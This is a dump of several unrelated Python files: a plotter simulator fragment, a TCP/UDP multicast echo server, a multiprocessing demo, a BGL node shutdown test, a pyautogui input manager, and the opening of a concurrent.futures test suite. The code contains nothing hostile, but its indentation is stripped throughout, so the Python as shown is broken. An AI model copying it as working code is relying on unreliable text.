return plotter_controller.PlotterStep(x_step, y_step, draw_value=1)
def hasData(self):
return self.data_left > 0
import argparse
def main():
parser = argparse.ArgumentParser(description='Run a plotter simulator to show trajectory of a stepfile')
parser.add_argument('--stepfile', type=str, help="Path of the step file to simulate; if omitted, random steps are generated.")
parser.add_argument('--image-output-dir', type=str, help="Directory where the rendered simulation frames are written.")
args = parser.parse_args()
data_provider = step_file_data_provider.StepFileDataProvider(args.stepfile) if args.stepfile else RandomDataProvider(number_of_data=10000)
image_output_dir = args.image_output_dir
controller = PlotterSimulatorController(data_provider, image_output_dir=image_output_dir)
controller.start()
controller.wait()
if __name__ == "__main__":
main()
|
srv_asyncio.py
|
from select import select
from socket import (socket, inet_aton, getfqdn, gethostname, gethostbyname_ex,
    AF_INET, SOCK_STREAM, SOCK_DGRAM, SOL_SOCKET, SO_REUSEADDR, SOL_IP,
    IP_DROP_MEMBERSHIP, IP_ADD_MEMBERSHIP, INADDR_ANY, IP_MULTICAST_TTL, IP_MULTICAST_LOOP)
from threading import Thread,Condition
try:
from queue import Queue,Empty
except ImportError:
from Queue import Queue,Empty
import asyncio
import struct
class tcp_srv:
def __init__(self):
#sockets from which we except to read
self.inputs = []
#tcp connected client sockets
self.tcp_clients = []
#udp outgoing message queue: a single Queue holding (server_socket, address, msg) tuples
self.udp_message_queue = None
#tcp connected clients Outgoing message queues (socket:Queue)
self.tcp_clients_message_queues = {}
self.tcp_server = []
self.udp_server = []
self.cast_server = []
self.__callback_dict = {}
self.__server_info = {}
self.__tcp_clients_info = {}
#An optional parameter for select is TIMEOUT
self.timeout = 3.0
self.client_timeout = 1.0
self.__tcp_callback = None
self.__tcp_err_callback = None
self.__udp_err_callback = None
self.__udp_callback = None
self.__multicast_callback = None
self.__thread_id = None
self.__client_thread_id = None
self._client_con_sig = Condition()
self.__quit = False
self.__client_quit = False
def start_server(self,sock_type='tcp',host='0.0.0.0',port=10086,multicast_ip=None):
#create a socket
__is_stream_sock = False
for server, srv_info in self.__server_info.items():
if srv_info['sock_type'] == sock_type and srv_info['port'] == port and srv_info['host'] == host and srv_info['multicast_ip'] == multicast_ip:
srv_info['req_stop'] = False
return server
if sock_type == 'tcp':
server = socket(AF_INET,SOCK_STREAM)
__is_stream_sock = True
else:
server = socket(AF_INET,SOCK_DGRAM)
__is_stream_sock = False
if self.udp_message_queue is None:
self.udp_message_queue = Queue()
#set option reused
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
print ('start srv:',sock_type,host,port,multicast_ip)
if not isinstance(host,str):
host = host.decode()
if __is_stream_sock is False:
if multicast_ip is not None:
if not isinstance(multicast_ip,str):
multicast_ip = multicast_ip.decode()
mreq = struct.pack('4sl',inet_aton(multicast_ip),int(INADDR_ANY))
server.setsockopt(SOL_IP, IP_MULTICAST_TTL, 2)
server.setsockopt(SOL_IP, IP_MULTICAST_LOOP, 0)
server.setsockopt(SOL_IP, IP_ADD_MEMBERSHIP, mreq)
self.cast_server.append(server)
else:
self.udp_server.append(server)
else:
self.tcp_server.append(server)
server.setblocking(False)
server.bind((host,port))
if __is_stream_sock is True:
server.listen(36)
self.__server_info.setdefault(server,{'sock_type':sock_type,'host':host,'port':port,'methods':{},'multicast_ip':multicast_ip,'req_stop':False})
self.inputs.append(server)
return server
def get_inet_aton(self,addr_str):
addr = inet_aton(addr_str)
#print ('addr',addr)
if isinstance(addr[0],int):
return (addr[0] << 24) + (addr[1] << 16) + (addr[2]<<8) + addr[3]
else:
return (ord(addr[0]) << 24) + (ord(addr[1]) << 16) + (ord(addr[2])<<8) + ord(addr[3])
def get_inet_ntoa(self,addr_uint):
return '%d.%d.%d.%d'%((addr_uint>>24)&0xff, (addr_uint>>16)&0xff, (addr_uint>>8)&0xff, addr_uint&0xff)
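# Worked example (hypothetical address): get_inet_aton('192.0.2.1') == 0xC0000201 and
# get_inet_ntoa(0xC0000201) == '192.0.2.1'; the two helpers are inverses for any
# dotted-quad IPv4 address.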
def get_own_addr_hash_list(self):
myname = getfqdn(gethostname())
ipList = gethostbyname_ex(myname)
#print (self._srv_s.getsockname())
addr_int_list = []
for addr in ipList[2]:
addr_int_list.append(self.get_inet_aton(addr))
#print (addr_int_list)
return addr_int_list
def do_send_udp_cast(self,msg,host='224.0.0.119',port=30000):
for server, srv_info in self.__server_info.items():
if srv_info['sock_type'] != 'tcp' and srv_info['multicast_ip'] is not None and srv_info['req_stop'] is False:
address = (srv_info['multicast_ip'],srv_info['port'])
self.udp_message_queue.put((server,address,msg))
return 0
return None
def send_data(self,cur_dev,real_send_str,mode=None):
ret = None
if cur_dev.startswith('udp'):
if self.udp_server:
addr = cur_dev[4:-1].split(':')
if len(addr) == 2 and addr[1].isdigit():
pear = (addr[0],int(addr[1]))
self.udp_message_queue.put((self.udp_server[0],pear,real_send_str))
ret = 0
elif cur_dev.startswith('tcp'):
#print ('send',cur_dev,real_send_str)
self._client_con_sig.acquire()
for client_sock,client_info in self.__tcp_clients_info.items():
#print (client_info['address'])
client_dev = "tcp(%s:%d)"%(client_info['address'][0],client_info['address'][1])
if client_dev == cur_dev and client_sock in self.tcp_clients_message_queues:
self.tcp_clients_message_queues[client_sock].put(real_send_str)
ret = 0
break
self._client_con_sig.release()
return ret
def stop_server(self,sock_type='tcp',host='0.0.0.0',port=10086,multicast_ip=None):
for server, srv_info in self.__server_info.items():
if srv_info['sock_type'] == sock_type and srv_info['port'] == port and srv_info['host'] == host and srv_info['multicast_ip'] == multicast_ip:
srv_info['req_stop'] = True
print ('stop srv:',sock_type,host,port,multicast_ip)
#print ('self.__server_info:',self.__server_info)
if len(self.inputs) == 0:
print ('stop server thread')
self.stop()
def set_callback(self,type='tcp',callback=None):
if type == 'tcp':
self.__tcp_callback = callback
elif type == 'udp_cast':
self.__multicast_callback = callback
elif type == 'tcp_err':
self.__tcp_err_callback = callback
elif type == 'udp_err':
self.__udp_err_callback = callback
else:
self.__udp_callback = callback
def register_function(self,server,req,callback_function):
if server in self.__server_info:
srv_info = self.__server_info[server]
if not isinstance(req,bytes):
req = req.encode()
srv_info['methods'].setdefault(req,callback_function)
return None
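# Minimal usage sketch (hypothetical port and handler). Note that in the code shown
# here only the UDP/multicast path in srv_routine() dispatches methods registered via
# register_function(); TCP clients get the built-in ECHO/ACK handling in _client_routine().
#
#   srv = tcp_srv()
#   udp_sock = srv.start_server(sock_type='udp', host='0.0.0.0', port=10086)
#   srv.register_function(udp_sock, b'PING', lambda pear, ctx, msg: print('PING from', pear))
#   srv.run()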
def run_client_manager(self):
self.__client_thread_id = Thread(target=self._client_routine,args=())
self.__client_thread_id.setDaemon(True)
self.__client_thread_id.start()
def run(self):
if len(self.inputs) == 0:
return
if self.__thread_id is not None and not self.__thread_id.is_alive():
self.__quit = True
self.__thread_id.join()
self.__thread_id = None
if self.__thread_id is None:
self.__quit = False
self.__thread_id = Thread(target=self.routine,args=())
self.__thread_id.start()
if self.__client_thread_id is None:
self.__client_quit = False
self.run_client_manager()
def stop(self):
self.__quit = True
self.__client_quit = True
if self.__thread_id is not None and self.__thread_id.is_alive():
self.__thread_id.join()
self.__thread_id = None
def __remove_client_connection(self, fd):
self._rm_client_connection(fd)
try:
fd.close()
except Exception as e:
print ('Exception in close/remove connection:%s'%e)
pass
def __remove_server(self, s):
if s in self.inputs:
self.inputs.remove(s)
if s in self.tcp_server:
self.tcp_server.remove(s)
if s in self.udp_server:
self.udp_server.remove(s)
if s in self.cast_server:
self.cast_server.remove(s)
try:
s.close()
except Exception as e:
print ('Exception in close s:%s'%e)
pass
def __check_req_stop_server(self):
#print ('__server_info',self.__server_info)
need_del_server = [server_sock for server_sock in self.__server_info.keys() if self.__server_info[server_sock]['req_stop'] == True]
#print ('need_del_server',need_del_server)
for server_sock in need_del_server:
multicast_ip = self.__server_info[server_sock]['multicast_ip']
if multicast_ip is not None and self.__server_info[server_sock]['sock_type'].startswith('udp'):
mreq = struct.pack('4sl',inet_aton(multicast_ip),INADDR_ANY)
server_sock.setsockopt(SOL_IP, IP_DROP_MEMBERSHIP, mreq)
self.__remove_server(server_sock)
del self.__server_info[server_sock]
#print ('new___server_info',self.__server_info)
return len(self.inputs)
def _add_client_connection(self,server_sock,client_sock,client_addr):
self._client_con_sig.acquire()
self.tcp_clients.append(client_sock)
if client_sock not in self.__tcp_clients_info:
self.__tcp_clients_info.setdefault(client_sock,{'active':True,'parent':server_sock,'address':client_addr})
self._client_con_sig.notifyAll()
self._client_con_sig.release()
def _rm_client_connection(self,client_sock):
self._client_con_sig.acquire()
if client_sock in self.tcp_clients:
self.tcp_clients.remove(client_sock)
if client_sock in self.__tcp_clients_info:
del self.__tcp_clients_info[client_sock]
self._client_con_sig.release()
def _client_routine(self,args=None):
while self.__client_quit is False:
tcp_clients_sets = []
self._client_con_sig.acquire()
tcp_clients_sets = self.tcp_clients
self._client_con_sig.release()
if not self.tcp_clients:
print ('tcp_clients_sets none')
self._client_con_sig.acquire()
self._client_con_sig.wait()
self._client_con_sig.release()
continue
readable , writable , exceptional = select(tcp_clients_sets, [], tcp_clients_sets, self.client_timeout)
#print ('tcp_clients',tcp_clients_sets)
            # When the timeout is reached, select returns three empty lists
for s in exceptional:
print (" exception condition on ", s.getpeername() )
#stop listening for input on the connection
self.__remove_client_connection(s)
for s in readable :
try:
__fx = s.fileno()
                except Exception as e:
print (" get fileno err %s"%e)
self.__remove_client_connection(s)
pass
continue
                skip_close = False
                pear = None  # so the error callback below never sees an undefined name
try:
pear = s.getpeername()
data = s.recv(2048)
if data :
#print (" received %s from %s" %(data ,pear) )
if s not in self.tcp_clients_message_queues:
self.tcp_clients_message_queues[s] = Queue()
if self.__tcp_callback is not None:
self.__tcp_callback(pear,self.__callback_dict,data)
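                        # Reply protocol: b'ECHO<payload>' is answered with just <payload>,
                        # any other TCP data gets b'ACK<length>\n'.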
if data.startswith(b'ECHO') or data.startswith(b'echo'):
self.tcp_clients_message_queues[s].put(data[4:])
else:
self.tcp_clients_message_queues[s].put(b'ACK%d\n'%len(data))
elif skip_close is False:
#Interpret empty result as closed connection
print (" closing ", pear )
if self.__tcp_err_callback is not None:
self.__tcp_err_callback(pear,self.__callback_dict,'close')
self.__remove_client_connection(s)
except Exception as e:
print ('Exception in recv %s, do close'%e)
if self.__tcp_err_callback is not None and pear is not None:
self.__tcp_err_callback(pear,self.__callback_dict,'close')
self.__remove_client_connection(s)
pass
if tcp_clients_sets:
_readable , _writable , _exceptional = select([], tcp_clients_sets, [], 0.001)
for s in _writable:
if s not in self.tcp_clients_message_queues:
continue
tcp_queue_empty = False
#try send udp ack msg
while tcp_queue_empty is False:
try:
send_msg = self.tcp_clients_message_queues[s].get_nowait()
except Empty:
#print (" queue empty", s.getpeername() )
tcp_queue_empty = True
pass
except Exception as e:
print (" queue err:%s in key%s\n"%(e,s) )
tcp_queue_empty = True
pass
else:
#print (" sending %s to %s" %(send_msg,str(s)) )
#for req,callback_function in self.__tcp_clients[s]['methods'].items():
# if next_msg.startswith(req):
# callback_function(pear,self.__callback_dict,next_msg)
s.send(send_msg)
else:
print ('srv_select client thread quit')
    def routine(self,args=None):
        # The original body here was an asyncio leftover that referenced an
        # undefined hello() coroutine; run the blocking select-based loop instead.
        self.srv_routine(args)
    def srv_routine(self,args=None):
while self.inputs and self.__quit is False:
if 0 == self.__check_req_stop_server():
break
readable , writable , exceptional = select(self.inputs, [], self.inputs, self.timeout)
#print (readable , writable , exceptional)
            # When the timeout is reached, select returns three empty lists
for s in readable :
if s in self.tcp_server:
# A "readable" socket is ready to accept a connection
try:
connection, client_address = s.accept()
#print (" connection from %s to %s\n"%(str(client_address),connection.getsockname()))
connection.setblocking(0)
self._add_client_connection(s,connection,client_address)
except Exception as e:
print ('Exception in accept %s'%e)
pass
elif s in self.udp_server or s in self.cast_server:
try:
next_msg, pear = s.recvfrom(4096)
if next_msg:
#print (" connection %s from %s to %s\n"% (str(next_msg),str(pear),s.getsockname()))
if self.__server_info[s]['multicast_ip'] is not None and self.__multicast_callback is not None:
self.__multicast_callback(pear,self.__callback_dict,next_msg)
elif self.__udp_callback is not None:
self.__udp_callback(pear,self.__callback_dict,next_msg)
for req,callback_function in self.__server_info[s]['methods'].items():
if next_msg.startswith(req):
callback_function(pear,self.__callback_dict,next_msg)
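                            # Same ECHO/ACK convention as the TCP path; replies are queued on
                            # udp_message_queue and sent with sendto() below. Plain (non-ECHO)
                            # datagrams on a multicast socket are not ACKed.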
if next_msg.startswith(b'ECHO') or next_msg.startswith(b'echo'):
self.udp_message_queue.put((s,pear,next_msg[4:]))
elif self.__server_info[s]['multicast_ip'] is None:
self.udp_message_queue.put((s,pear,b'ACK%d\n'%len(next_msg)))
else:
print ('udp msg none', pear)
except Exception as e:
print ('Exception in udp recvfrom %s'%e)
#e.errno == socket.errno.EWOULDBLOCK:
pass
else:
                    print ('srv_select: unexpected socket, this branch should not be reached')
udp_queue_empty = False
#try send udp ack msg
while udp_queue_empty is False:
try:
server_sock,pear,send_msg = self.udp_message_queue.get_nowait()
except Empty:
udp_queue_empty = True
pass
except Exception as e:
print ('get udp msg exception:%s'%e)
udp_queue_empty = True
pass
else:
if server_sock in self.udp_server or server_sock in self.cast_server:
try:
server_sock.sendto(send_msg,0,pear)
except Exception as e:
print ('srv_select sendto err:%s'%e)
pass
else:
print ('srv_select routine thread quit')
def __del__(self):
for s in self.tcp_server:
s.close()
for s in self.udp_server:
s.close()
for s in self.cast_server:
s.close()
for s in self.tcp_clients:
s.close()
for s,Q in self.tcp_clients_message_queues.items():
del Q
if '__main__' == __name__:
srv = tcp_srv()
def callback(pear,srv_info,msg_data):
print ('<==TCP [%s:%s]' %(pear,msg_data))
def udp_callback(pear,srv_info,msg_data):
print ('<==UDP [%s:%s]' %(pear,msg_data))
#srv1 = srv.start_server('udp','0.0.0.0',10086)
srv2 = srv.start_server('tcp','0.0.0.0',10086)
srv3 = srv.start_server('udp','0.0.0.0',10086,'224.0.0.119')
srv.set_callback('tcp',callback)
srv.set_callback('udp',udp_callback)
def show_cb_msg(a,b,c):
print('UDP',a,b,c)
def show_cb_msg2(a,b,c):
print('TCP',a,b,c)
#srv.register_function(srv1,'GET',show_cb_msg)
#srv.register_function(srv2,'GET',show_cb_msg2)
srv.register_function(srv3,'GET',show_cb_msg2)
srv.run()
while 1:
try:
            send_str = input()
except:
break
srv.stop()
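# Hedged illustration (not part of the original server): the handlers above
# answer b'ECHO<payload>' with just <payload> and any other TCP data with
# b'ACK<length>\n'. The helper below, with names of our own choosing, shows one
# way to exercise that behaviour from a client once the server is running.
def demo_echo_client(host='127.0.0.1', port=10086):
    from socket import socket, AF_INET, SOCK_STREAM
    with socket(AF_INET, SOCK_STREAM) as client:
        client.connect((host, port))
        client.sendall(b'ECHOhello')
        print('echo reply:', client.recv(2048))   # expected: b'hello'
        client.sendall(b'PING!')
        print('ack reply:', client.recv(2048))    # expected: b'ACK5\n'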
|
multiprocess_testing.py
|
#!/usr/bin/env python
# coding=utf-8
# Copyright © 2016 ButenkoMS. All rights reserved. Contacts: <gtalk@butenkoms.space>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from multiprocessing import Process, Queue
import os
# Absolute import so the demo below can also be run directly as a script.
from multiprocessing_task_runner import SubprocessWorker
import sys
"""
Module Docstring
Docstrings: http://www.python.org/dev/peps/pep-0257/
"""
__author__ = "ButenkoMS <gtalk@butenkoms.space>"
__copyright__ = "Copyright © 2016 ButenkoMS. All rights reserved. Contacts: <gtalk@butenkoms.space>"
__credits__ = ["ButenkoMS <gtalk@butenkoms.space>", ]
__license__ = "Apache License, Version 2.0"
__version__ = "1.0.0"
__maintainer__ = "ButenkoMS <gtalk@butenkoms.space>"
__email__ = "gtalk@butenkoms.space"
# __status__ = "Prototype"
__status__ = "Development"
# __status__ = "Production"
def funct(inputData):
result = inputData[0] / inputData[1]
return result
if __name__ == '__main__':
process0 = SubprocessWorker(funct)
process1 = SubprocessWorker(funct)
process0.start()
process1.start()
data0 = (3, 2)
data1 = (5, 0)
process0.send_data_to_subprocess(data0)
process1.send_data_to_subprocess(data1)
try:
answer0 = process0.get_answer_from_subprocess()
print('answer0 = ', answer0)
answer1 = process1.get_answer_from_subprocess()
print('answer1 = ', answer1)
except:
print()
print('<<< BROAD EXCEPTION:')
print(sys.exc_info()[0])
print(sys.exc_info()[1])
print('>>>')
raise
process0.stop()
process1.stop()
#class Multi_Test:
#
# def __init__(self, queue):
# self.queue = queue
#
# def info(self, title):
# print(title)
# print('module name:', __name__)
# if hasattr(os, 'getppid'): # only available on Unix
# print('parent process:', os.getppid())
# print('process id:', os.getpid())
#
# def f(self, name):
# self.info('function f')
# print('hello', name[1])
# name[0].put('hello')
#
# def start_process(self, ):
# self.info('main line')
# p = Process(target=self.f, args=((self.queue, 'bob'),))
# p.start()
# p.join()
# print(self.queue.get())
#
#if __name__ == '__main__':
# q = Queue()
# mp = Multi_Test(q)
# mp.start_process()
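# SubprocessWorker itself lives in multiprocessing_task_runner and is not shown
# in this file. Purely as a hypothetical sketch of the interface the demo above
# relies on (start/stop, send_data_to_subprocess, get_answer_from_subprocess),
# one possible shape, built on the Process and Queue imported at the top of this
# module, could look like this; the real class may well differ.
class SubprocessWorkerSketch:
    def __init__(self, func):
        self._func = func
        self._in_queue = Queue()
        self._out_queue = Queue()
        self._process = Process(target=self._loop, daemon=True)

    def _loop(self):
        # Runs in the child: pull items until the None sentinel, ship back either
        # the result or the exception raised by the wrapped function.
        while True:
            item = self._in_queue.get()
            if item is None:
                break
            try:
                self._out_queue.put(('ok', self._func(item)))
            except Exception as exc:
                self._out_queue.put(('error', exc))

    def start(self):
        self._process.start()

    def send_data_to_subprocess(self, data):
        self._in_queue.put(data)

    def get_answer_from_subprocess(self):
        status, payload = self._out_queue.get()
        if status == 'error':
            raise payload
        return payload

    def stop(self):
        self._in_queue.put(None)
        self._process.join()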
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test BGLd shutdown."""
from test_framework.test_framework import BGLTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BGLTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure the event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
input_manager.py
|
from config.config import REPEAT_DELAY, REPEAT_RATE, IS_WINDOWS
import time
import pyautogui
pyautogui.FAILSAFE = False
pyautogui.PAUSE = 0.0
if (IS_WINDOWS == True):
import pydirectinput
pydirectinput.FAILSAFE=False
pydirectinput.PAUSE = 0.0
import threading
# Manages sending inputs to manipulate the keyboard or mouse, or to print out statements in testing mode
class InputManager:
function_mappings = {
'press': False,
'keyDown': False,
'keyUp': False,
'click': False,
'mouseDown': False,
'mouseUp': False,
}
special_keys = ['ctrl', 'shift', 'alt']
toggle_keys = {
'ctrl': False,
'shift': False,
'alt': False,
'up': False,
'down': False,
'left': False,
'right': False
}
key_hold_timings = {}
is_testing = False
use_direct_keys = False
# Used for input key up delays
input_release_lag_ms = 0
press_timings = {}
input_release_thread = None
def __init__(self, is_testing = False, repeat_delay=REPEAT_DELAY, repeat_rate=REPEAT_RATE, use_direct_keys=False, input_release_lag_ms=0):
self.is_testing = is_testing
self.repeat_delay = repeat_delay
self.repeat_rate_ms = round(1000 / repeat_rate) / 1000
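        # e.g. repeat_rate=20 repeats/second -> round(1000 / 20) = 50 ms -> stored as
        # 0.05 (seconds between repeats, despite the _ms suffix in the name)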
        # When every key press needs an extra release delay (for example because the
        # game being played has a lot of input lag), we start a separate thread so the
        # rest of the program keeps running as smoothly as possible.
self.input_release_lag_ms = input_release_lag_ms
if (self.input_release_lag_ms > 0):
self.input_release_thread = threading.Thread(name='input_release_thread', target=input_release_thread, args=(self, self.input_release_lag_ms / 1000 ) )
            self.input_release_thread.daemon = True
self.input_release_thread.start()
# Use DirectX keys - Needed in some programs that do not capture virtual keycodes
self.use_direct_keys = use_direct_keys
if (use_direct_keys == True):
print("Using DirectX keycodes" )
if( is_testing ):
self.function_mappings['press'] = self.pressTest
self.function_mappings['keyDown'] = self.keyDownTest
self.function_mappings['keyUp'] = self.keyUpTest
self.function_mappings['click'] = self.clickTest
self.function_mappings['mouseDown'] = self.mouseDownTest
self.function_mappings['mouseUp'] = self.mouseUpTest
elif (self.use_direct_keys == True and IS_WINDOWS == True):
self.function_mappings['press'] = self.pressActionDirect
self.function_mappings['keyDown'] = self.keyDownActionDirect
self.function_mappings['keyUp'] = self.keyUpActionDirect
self.function_mappings['click'] = self.clickActionDirect
self.function_mappings['mouseDown'] = self.mouseDownActionDirect
self.function_mappings['mouseUp'] = self.mouseUpActionDirect
else:
self.function_mappings['press'] = self.pressAction
self.function_mappings['keyDown'] = self.keyDownAction
self.function_mappings['keyUp'] = self.keyUpAction
self.function_mappings['click'] = self.clickAction
self.function_mappings['mouseDown'] = self.mouseDownAction
self.function_mappings['mouseUp'] = self.mouseUpAction
def __del__(self):
if(self.input_release_thread is not None):
for key in self.press_timings:
self.keyUp(key)
def press( self, key ):
if (self.input_release_lag_ms == 0):
self.function_mappings['press'](key)
elif (key not in self.press_timings ):
self.press_timings[key] = time.time()
self.keyDown(key)
def keyDown( self, key ):
self.function_mappings['keyDown'](key)
def hold( self, key, repeat_rate_ms=0 ):
if( repeat_rate_ms == 0 ):
repeat_rate_ms = self.repeat_rate_ms
if( key in self.toggle_keys.keys() ):
if (self.toggle_keys[key] == False):
self.keyDown( key )
self.toggle_keys[ key ] = True
else:
if( key not in self.key_hold_timings ):
self.key_hold_timings[key] = time.time()
self.press(key)
elif( time.time() - self.key_hold_timings[ key ] > self.repeat_delay ):
self.key_hold_timings[ key ] += repeat_rate_ms
self.press(key)
def release_non_toggle_keys( self ):
heldDownKeys = list(self.key_hold_timings)
for key in heldDownKeys:
if( key not in self.toggle_keys.keys() ):
self.release( key )
def release_special_keys( self ):
for key in self.special_keys:
if( self.toggle_keys[ key ] == True ):
self.release( key )
def release( self, key ):
if( self.is_testing ):
print( "-> RELEASING " + key )
if( key in self.toggle_keys and self.toggle_keys[key] == True ):
self.keyUp( key )
self.toggle_keys[ key ] = False
elif( key in self.key_hold_timings ):
del self.key_hold_timings[key]
def keyUp( self, key ):
self.function_mappings['keyUp'](key)
def click( self, button='left' ):
self.function_mappings['click'](button)
def mouseUp( self, button='left' ):
self.function_mappings['mouseUp'](button)
def mouseDown( self, button='left' ):
self.function_mappings['mouseDown'](button)
# --------- ACTUAL PYAUTOGUI ACTIONS ---------
def pressAction(self, key):
print( "----------> PRESSING " + key )
pyautogui.press( key )
def keyDownAction(self, key):
print( "----------> HOLDING DOWN " + key )
pyautogui.keyDown( key )
def keyUpAction(self, key):
print( "----------> RELEASING " + key )
pyautogui.keyUp( key )
    def holdAction( self, key, throttle=None ):
        # Note: the original referenced the undefined names `throttle` and
        # `last_key_timestamp`; default the throttle to the configured repeat rate.
        throttle = self.repeat_rate_ms if throttle is None else throttle
        if( time.time() - getattr(self, 'last_key_timestamp', 0) > throttle ):
            self.last_key_timestamp = time.time()
            self.press( key )
def clickAction(self, button='left'):
print( "----------> CLICKING " + button )
pyautogui.click( button=button )
def mouseDownAction( self, button='left' ):
print( "----------> HOLDING DOWN MOUSE " + button )
pyautogui.mouseDown( button=button )
def mouseUpAction( self, button='left' ):
print( "----------> RELEASING MOUSE " + button )
pyautogui.mouseUp( button=button )
# --------- ACTUAL PYDIRECTINPUT ACTIONS ---------
def pressActionDirect(self, key):
print( "----------> PRESSING " + key )
pydirectinput.press( key )
def keyDownActionDirect(self, key):
print( "----------> HOLDING DOWN " + key )
pydirectinput.keyDown( key )
def keyUpActionDirect(self, key):
print( "----------> RELEASING " + key )
pydirectinput.keyUp( key )
    def holdActionDirect( self, key, throttle=None ):
        # Same fix as holdAction above: the throttle falls back to the repeat rate.
        throttle = self.repeat_rate_ms if throttle is None else throttle
        if( time.time() - getattr(self, 'last_key_timestamp', 0) > throttle ):
            self.last_key_timestamp = time.time()
            self.press( key )
def clickActionDirect(self, button='left'):
print( "----------> CLICKING " + button )
pydirectinput.click( button=button )
def mouseDownActionDirect( self, button='left' ):
print( "----------> HOLDING DOWN MOUSE " + button )
pydirectinput.mouseDown( button=button )
def mouseUpActionDirect( self, button='left' ):
print( "----------> RELEASING MOUSE " + button )
pydirectinput.mouseUp( button=button )
# --------- TEST METHODS FOR PRINTING ---------
def pressTest(self, key):
print( "-> Pressing " + key.upper() )
def keyDownTest(self, key):
print( "-> Holding down " + key.upper() )
def keyUpTest(self, key):
print( "-> Releasing " + key.upper() )
def holdTest(self, key):
print( "-> Pressing " + key.upper() )
def releaseTest(self, key):
print( "-> Releasing " + key.upper() )
def clickTest(self, button='left'):
print( "-> Clicking " + button.upper() + " mouse button" )
def mouseDownTest( self, button='left' ):
print( "-> Holding down " + button.upper() + " mouse button" )
def mouseUpTest( self, button='left' ):
print( "-> Releasing " + button.upper() + " mouse button" )
def input_release_thread( inputManager, loop_delay):
while(True):
current_time = time.time()
deleted_keys = []
        for key in list(inputManager.press_timings):  # snapshot: the dict is mutated by other threads
if ( current_time - inputManager.press_timings[key] > loop_delay):
inputManager.keyUp(key)
deleted_keys.append(key)
for key in deleted_keys:
del inputManager.press_timings[key]
time.sleep(loop_delay / 4)
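# Quick usage sketch (our own addition, not part of the original module): with
# is_testing=True none of the pyautogui/pydirectinput calls fire; the actions are
# only printed, which makes it easy to see how press/hold/release interact.
if __name__ == '__main__':
    manager = InputManager(is_testing=True)
    manager.press('space')             # one-off press, printed only
    manager.hold('shift')              # toggle keys stay down until released
    manager.hold('a')                  # other keys repeat while held
    manager.release_non_toggle_keys()  # releases 'a'
    manager.release_special_keys()     # releases 'shift'
    manager.click('left')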
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, mgr):
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
